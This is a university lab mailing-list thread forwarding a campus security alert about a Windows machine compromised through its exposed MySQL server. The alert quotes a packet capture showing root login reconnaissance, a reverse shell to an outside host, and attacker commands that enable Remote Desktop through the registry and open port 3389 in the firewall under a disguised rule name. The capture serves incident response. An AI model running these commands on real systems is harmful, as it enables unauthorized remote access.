[4eyes] [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server
Yon Visell
yonvisell at gmail.com
Thu Jan 19 20:26:20 PST 2017
Matthew,
Is this on the wired network, so that they’re sure that it is linked to the 4eyes lab?
I’ll forward the notice to folks in my lab to make sure it’s not assigned to one of our machines.
- Yon
_________________________________________________________
Yon Visell, PhD
Assistant Professor
University of California, Santa Barbara
Department of Electrical and Computer Engineering
Media Arts & Technology Graduate Program
Department of Mechanical Engineering (by courtesy)
www.re-touch-lab.com
Mobile: +1 267 800 8960
_________________________________________________________
> On Jan 19, 2017, at 5:58 PM, Matthew Turk <mturk at cs.ucsb.edu> wrote:
>
> No one has claimed this machine yet. Please check yours and let me know. (There are usual suspects here, but I won't name names!)
>
> Matthew
>
> -----Original Message-----
> From: Matthew Turk [mailto:mturk21 at gmail.com] On Behalf Of Matthew Turk
> Sent: Wednesday, January 18, 2017 9:20 PM
> To: ilab-users at lists.cs.ucsb.edu
> Subject: FW: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server
>
> Whose machine is 128.111.28.118? Please check - if it's yours, please let me know and see the info below.
>
> Thanks,
> Matthew
>
> -----Original Message-----
> From: Tier II Support Issues via CoE Support [mailto:help at engineering.ucsb.edu]
> Sent: Wednesday, January 18, 2017 10:41 AM
> To: holl at cs.ucsb.edu; mturk at cs.ucsb.edu
> Subject: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server
>
> The following reply has been made regarding CoE Support ticket #74336:
>
> Hi Matt and Tobias,
>
> OIT has sent us this warning about the ilab-118 machine, which is compromised and needs to be looked into. Please read the information below.
>
> On Wed Jan 18 10:24:26 2017, security at ucsb.edu wrote:
>> Greetings,
>>
>> 128.111.28.118 has been compromised and has been blocked. The host was
>> compromised via its MySQL server.
>>
>> Before correcting any problems, please consider whether any sensitive
>> personal information is stored on this device. If this device contains
>> personal information and if it appears to have been compromised,
>> please contact the UCSB Chief Information Security Officer, at
>> CISO at oist.ucsb.edu or 893-5005 immediately.
>>
>> To view the UCSB procedures when a device storing personal information
>> has been compromised, please visit:
>> http://www.ets.ucsb.edu/security/sb-1386-and-ab-1298-guideline
>>
>> Please investigate and advise. Here is a sample of traffic from the
>> trojan:
>>
>> ----------sample----------
>> T 2017/01/18 02:45:47.091988 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> ......
>>
>> T 2017/01/18 02:45:47.497391 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> J...
>> 5.5.11..+..EV``AdUY...!...............B~tMc*DXpHVW.mysql_native_password.
>>
>> T 2017/01/18 02:45:47.684113 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>>
>> V.......... at ........................root......Ndy....3......;.mysql.mysql_native_password.
>>
>> T 2017/01/18 02:45:47.684972 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> ...........
>>
>> T 2017/01/18 02:45:47.878832 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> .....SELECT @@max_allowed_packet;
>>
>> T 2017/01/18 02:45:47.899132 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>>
>> .....*....def....@@max_allowed_packet..?.........................1048576.........
>>
>> T 2017/01/18 02:45:48.088029 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> .....SHOW VARIABLES LIKE 'VERS%';
>>
>> T 2017/01/18 02:45:48.287569 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [A]
>> ......
>>
>> T 2017/01/18 02:45:48.331489 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>>
>> .....T....def.information_schema.VARIABLES.VARIABLES.Variable_name.VARIABLE_NAME... at .........M....def.information_schema.VARIABLES.VARIABLES.Value.VARIABLE_VALUE...................."......version.5.5.11-
>> ....version_comment.MySQL Community Server
>> (GPL).....version_compile_machine.x86.....version_compile_os.Win64.......".
>>
>> T 2017/01/18 02:45:48.682703 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> ......
>>
>> T 2017/01/18 02:45:50.427705 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>>
>> ....USE MYSQL
>>
>> T 2017/01/18 02:45:50.428403 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> ...........
>>
>> T 2017/01/18 02:45:50.613848 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> .....SELECT @@version_compile_os;
>>
>> T 2017/01/18 02:45:50.614481 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>>
>> .....*....def....@@version_compile_os............................Win64.........
>>
>> T 2017/01/18 02:45:50.800022 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> .....SELECT @@plugin_dir;
>>
>> T 2017/01/18 02:45:50.800759 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> ....."....def....@@plugin_dir....2..................3...2C:\Program
>> Files\MySQL\MySQL Server 5.5\lib/plugin.........
>>
>> T 2017/01/18 02:45:50.990204 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> .l...SELECT
>>
>> T 2017/01/18 02:45:54.767136 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [A]
>> ......
>>
>> T 2017/01/18 02:45:55.049876 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> Microsoft Windows [Version 6.1.7601]
>>
>> T 2017/01/18 02:45:55.448211 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:45:55.448772 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> .
>> Copyright (c) 2009 Microsoft Corporation. All rights reserved..
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>>
>> T 2017/01/18 02:45:55.776319 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:46:19.130812 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [AP]
>> ipconfig
>>
>>
>> T 2017/01/18 02:46:19.131472 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> ipconfig
>>
>>
>> T 2017/01/18 02:46:19.304083 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [A]
>> .
>> Windows IP Configuration.
>> .
>> .
>> Ethernet adapter Local Area Connection:.
>> .
>> Connection-specific DNS Suffix . : cs.ucsb.edu.
>> IPv4 Address. . . . . . . . . . . : 128.111.28.118.
>> Subnet Mask . . . . . . . . . . . : 255.255.255.192.
>> Default Gateway . . . . . . . . . : 128.111.28.65.
>> .
>> Ethernet adapter Local Area Connection 2:.
>> .
>> Connection-specific DNS Suffix . : .
>> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4::1.
>> Link-local IPv6 Address . . . . . : fe80::b57a:afce:a5c3:9380%15.
>> IPv4 Address. . . . . . . . . . . : 10.37.130.2.
>> Subnet Mask . . . . . . . . . . . : 255.255.255.0.
>> Default Gateway . . . . . . . . . : .
>> .
>> Ethernet adapter Local Area Connection 2:.
>> .
>> Connection-specific DNS Suffix . : .
>> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:1::1.
>> Link-local IPv6 Address . . . . . : fe80::c9a9:464b:1f35:e7b3%17.
>> IPv4 Address. . . . . . . . . . . : 10.37.131.2.
>> Subnet Mask . . . . . . . . . . . : 255.255.255.0.
>> Default Gateway . . . . . . . . . : .
>> .
>> Tunnel adapter isatap.cs.ucsb.edu:.
>> .
>> Media State . . . . . . . . . . . : Media disconnected.
>> Connection-specific DNS Suffix . : cs.ucsb.edu.
>> .
>> Tunnel adapter isatap.{49BB9C41-C060-433B-BF91-9F104E841F11}:.
>> .
>> Media State . . . . . . . . . . . : Media disconnected.
>> Connection-specific DNS Suffix . : .
>> .
>> Tunnel adapter Local Area Connection* 11:.
>> .
>> Media State . . . . . . . . . . . : Media disconnected.
>> Connection-spec
>>
>> T 2017/01/18 02:46:19.304089 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> ific DNS Suffix . : .
>>
>>
>> T 2017/01/18 02:46:19.500202 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:46:19.500764 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> .
>> Tunnel adapter isatap.{EB59D303-0C84-4EF4-842B-01A57D775715}:.
>> .
>> Media State . . . . . . . . . . . : Media disconnected.
>> Connection-specific DNS Suffix . : .
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>>
>> T 2017/01/18 02:46:19.696722 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:46:44.733187 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [AP]
>> reg.exe ADD
>> "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
>> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
>>
>>
>> T 2017/01/18 02:46:44.733944 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> reg.exe ADD
>> "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
>> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
>>
>>
>> T 2017/01/18 02:46:45.104427 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:46:45.104905 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> The operation completed successfully...
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>>
>> T 2017/01/18 02:46:45.432785 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:46:56.087756 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [AP]
>> netsh advfirewall firewall add rule name = "Windows Service Host"
>> dir=in action=allow protocol=TCP localport=3389
>>
>>
>> T 2017/01/18 02:46:56.088487 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> netsh advfirewall firewall add rule name = "Windows Service Host"
>> dir=in action=allow protocol=TCP localport=3389
>>
>>
>> T 2017/01/18 02:46:56.596211 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:46:59.117911 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> Ok..
>> .
>>
>> T 2017/01/18 02:46:59.432046 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:46:59.432624 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> .
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>>
>> T 2017/01/18 02:46:59.761298 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:47:16.188439 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [AP]
>> net start
>>
>>
>> T 2017/01/18 02:47:16.189037 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> net start
>>
>>
>> T 2017/01/18 02:47:16.385997 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:47:16.427758 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> These Windows services are started:.
>>
>>
>> T 2017/01/18 02:47:16.428404 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [A]
>> .
>> Adobe Acrobat Update Service.
>> AMD External Events Utility.
>> Apple Mobile Device.
>> Application Experience.
>> Application Information.
>> Background Intelligent Transfer Service.
>> Base Filtering Engine.
>> Bonjour Service.
>> Certificate Propagation.
>> COM+ Event System.
>> Computer Browser.
>> Credential Manager.
>> Cryptographic Services.
>> DCOM Server Process Launcher.
>> Desktop Window Manager Session Manager.
>> DHCP Client.
>> Diagnostic Policy Service.
>> Diagnostic Service Host.
>> Diagnostics Tracking Service.
>> Distributed Link Tracking Client.
>> DNS Client.
>> Function Discovery Provider Host.
>> Function Discovery Resource Publication.
>> Group Policy Client.
>> Human Interface Device Access.
>> IKE and AuthIP IPsec Keying Modules.
>> IP Helper.
>> iPod Service.
>> IPsec Policy Agent.
>> LMIGuardianSvc.
>> LogMeIn.
>> LogMeIn Maintenance Service.
>> Microsoft Antimalware Service.
>> Microsoft Network Inspection.
>> Microsoft Office Click-to-Run Service.
>> MT7 Registry Service.
>> MT7 Serial Search Service.
>> MySQL55.
>> Network Connections.
>> Network List Service.
>> Network Location Awareness.
>> Network Store Interface Service.
>> Office Software Protection Platform.
>> Offline Files.
>> Parallels Networking Service.
>> Parallels Virtualization Service.
>> Plug and Play.
>> Pml Driver HPZ12.
>> PnP-X IP Bus Enumerator.
>> Portable Device Enumerator Service.
>> Power.
>> Print Spooler.
>> Program Compati
>>
>> T 2017/01/18 02:47:16.428408 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> bility Assistant Service
>>
>> T 2017/01/18 02:47:16.625665 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>>
>> T 2017/01/18 02:47:16.626533 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> .
>> Quality Windows Audio Video Experience.
>> Remote Access Connection Manager.
>> Remote Desktop Configuration.
>> Remote Desktop Services.
>> Remote Desktop Services UserMode Port Redirector.
>> Remote Procedure Call (RPC).
>> Routing and Remote Access.
>> RPC Endpoint Mapper.
>> Secondary Logon.
>> Secure Socket Tunneling Protocol Service.
>> Security Accounts Manager.
>> Security Center.
>> Server.
>> Shell Hardware Detection.
>> Skype C2C Service.
>> SQL Server (SQLEXPRESS).
>> SQL Server VSS Writer.
>> SSDP Discovery.
>> Superfetch.
>> System Event Notification Service.
>> Tablet PC Input Service.
>> TabletServicePen.
>> Task Scheduler.
>> TCP/IP NetBIOS Helper.
>> TeamViewer 11.
>> Telephony.
>> Themes.
>> UPnP Device Host.
>> User Profile Service.
>> Wacom Consumer Touch Service.
>> Windows App Certification Kit Fast User Switching Utility Service.
>> Windows Audio.
>> Windows Audio Endpoint Builder.
>> Windows Driver Foundation - User-mode Driver Framework.
>> Windows Event Log.
>> Windows Firewall.
>> Windows Font Cache Service.
>> Windows Image Acquisition (WIA).
>> Windows Management Instrumentation.
>> Windows Media Player Network Sharing Service.
>> Windows Presentation Foundation Font Cache 3.0.0.0.
>> Windows Search.
>> Windows Update.
>> WinHTTP Web Proxy Auto-Discovery Service.
>> Workstation.
>> .
>> The command completed successfully..
>> .
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>>
>> ----------sample----------
>> --
>> E. Todd Atkins
>> Enterprise Technology Services
>> University of California, Santa Barbara http://www.security.ucsb.edu/
>>
>> **********************************************************************
>> The NOC's list of network contacts is used to determine who should
>> receive email such as this. Please direct any requests for changes to
>> this list of network contacts to noc at ucsb.edu.
>> **********************************************************************
>>
>
>
> --
>
> Scott Kasai
> User Support Specialist
> Engineering Computing Infrastructure
> University of California, Santa Barbara
>
>
>
>
> _______________________________________________
> Ilab-users mailing list
> Ilab-users at lists.cs.ucsb.edu
> https://lists.cs.ucsb.edu/mailman/listinfo/ilab-users